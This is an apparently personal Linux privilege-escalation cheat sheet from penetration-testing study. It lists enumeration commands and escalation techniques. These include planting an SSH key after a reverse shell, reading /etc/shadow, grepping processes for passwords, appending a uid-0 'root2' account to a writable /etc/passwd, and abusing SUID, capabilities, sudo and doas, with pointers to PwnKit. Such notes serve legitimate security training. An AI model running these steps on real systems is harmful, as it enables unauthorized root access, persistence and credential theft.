Linux PE Methodology

Linux - Privilege Escalation - Internal All The Thingsswisskyrepo.github.io

IF GET REVERSE SHELL, SEE IF CAN PUT PRIVATE KEY INTO THE USER ACCOUNT SO THAT CAN LOGIN IN USING SSH OR USE Upgrading Shells

Example at Getting a proper user shell

cat <PUBLICKEYFILE>
echo <CONTENT OF PUBLICKEYFILE> > authorized_key

User Information

Get Current Username

whoami

Get User Context Information

id

Get all users

cat /etc/passwd

Get shadow file (Requires permission to read or write)

cat /etc/shadow

Privilege Group Privilege Escalation

Page not found - HackTricksbook.hacktricks.xyz

System Information

Get hostname

hostname

Get OS Information

cat /etc/issue
cat /etc/os-release
uname -a
uname -r

List System Process

ps aux

Network Information

Get IP Configuration

ip a
ifconfig

Get Routing Table

route
routel

Display active network connections and listening ports

netstat -an
ss -anp

Firewall rule location

/etc/iptables

For example,

cat /etc/iptables/rules.v4

Cron Job Information

List all scheduled task scripts

ls -lah /etc/cron*

View scheduled task for current user

crontab -l

Inspect Cron log file for running cron jobs

grep "CRON" /var/log/syslog

If there is nothing for Cron Job, try using PSPY

Application Installed

List applications installed (Debian-based)

dpkg -l

List applications installed (Red Hat-based)

rpm -qa

Finding Files

Find writable files in the whole root directory

find / -writable -type d 2>/dev/null

Find Files with specific extensions

find <PATH TO DIRECTORY> -type f -name '*.java' 2>/dev/null

Find writable file in the directory

find <PATH TO DIRECTORY> -writable -type d 2>/dev/null

Mounted Filesystem information

List all mounted filesystems

mount

List all drives that will be mounted

cat /etc/fstab

View all available disks

lsblk

Kernel Module information

View all loaded kernel modules

lsmod

View more information about specific module

/sbin/modinfo <MODULE NAME>

Unix-privesc-check binary location

Automated Tool Location

/usr/bin/unix-privesc-check

Environment Variable information

Get the environment details

env

Check .bashrc config file

cat .bashrc

Take snapshot

Take a single snapshot of the active process

watch -n 1 "ps -aux | grep pass"

Abusing passwd file permission

Sometimes if the /etc/passwd has write permission, can set an arbitrary password for any account

openssl passwd w00t
echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2
id

Abusing SUID

List of binaries that can abuse SUID

https://gtfobins.github.io/

List all SUID-marked binaries

find / -perm -u=s -type f 2>/dev/null

Abusing Capabilities

Search for all capabilities

/usr/bin/getcap -r / 2>/dev/null

Find cap_setuid+ep for the programs

Abuse `sudo` command

List all commands that is able to run as root

sudo -l

List sudo version

sudo -v

Abuse doas command

Introduction - Exploit Notesexploit-notes.hdks.org

Find the doas.conf

find / -type f -name "doas.conf" 2>/dev/null # To find the file

find / -type f -name "doas.conf" -exec cat {} + 2>/dev/null # To find and read the content of the file

Running the command

doas -u <user> <command> <arg>

Git

Under the .git/config file, it might contain some credentials which can used for privilege escalation.

PwnKit

GitHub - ly4k/PwnKit: Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege EscalationGitHub

PSPY

GitHub - DominicBreuker/pspy: Monitor linux processes without root permissionsGitHub

This does not need privileges to see Cron Job for root.

PreviousChecklist NextChecklist

Last updated 1 year ago

hashtagUser Information

hashtagGet Current Username

hashtagGet User Context Information

hashtagGet all users

hashtagGet shadow file (Requires permission to read or write)

hashtagPrivilege Group Privilege Escalation

hashtagSystem Information

hashtagGet hostname

hashtagGet OS Information

hashtagList System Process

hashtagNetwork Information

hashtagGet IP Configuration

hashtagGet Routing Table

hashtagDisplay active network connections and listening ports

hashtagFirewall rule location

hashtagCron Job Information

hashtagList all scheduled task scripts

hashtagView scheduled task for current user

hashtagInspect Cron log file for running cron jobs

hashtagApplication Installed

hashtagList applications installed (Debian-based)

hashtagList applications installed (Red Hat-based)

hashtagFinding Files

hashtagFind writable files in the whole root directory

hashtagFind Files with specific extensions

hashtagFind writable file in the directory

hashtagMounted Filesystem information

hashtagList all mounted filesystems

hashtagList all drives that will be mounted

hashtagView all available disks

hashtagKernel Module information

hashtagView all loaded kernel modules

hashtagView more information about specific module

hashtagUnix-privesc-check binary location

hashtagAutomated Tool Location

hashtagEnvironment Variable information

hashtagGet the environment details

hashtagCheck .bashrc config file

hashtagTake snapshot

hashtagTake a single snapshot of the active process

hashtagAbusing passwd file permission

hashtagAbusing SUID

hashtagList of binaries that can abuse SUID

hashtagList all SUID-marked binaries

hashtagAbusing Capabilities

hashtagSearch for all capabilities

hashtagAbuse sudo command

hashtagList all commands that is able to run as root

hashtagList sudo version

hashtagAbuse doas command

hashtagFind the doas.conf

hashtagRunning the command

hashtagGit

hashtagPwnKit

hashtagPSPY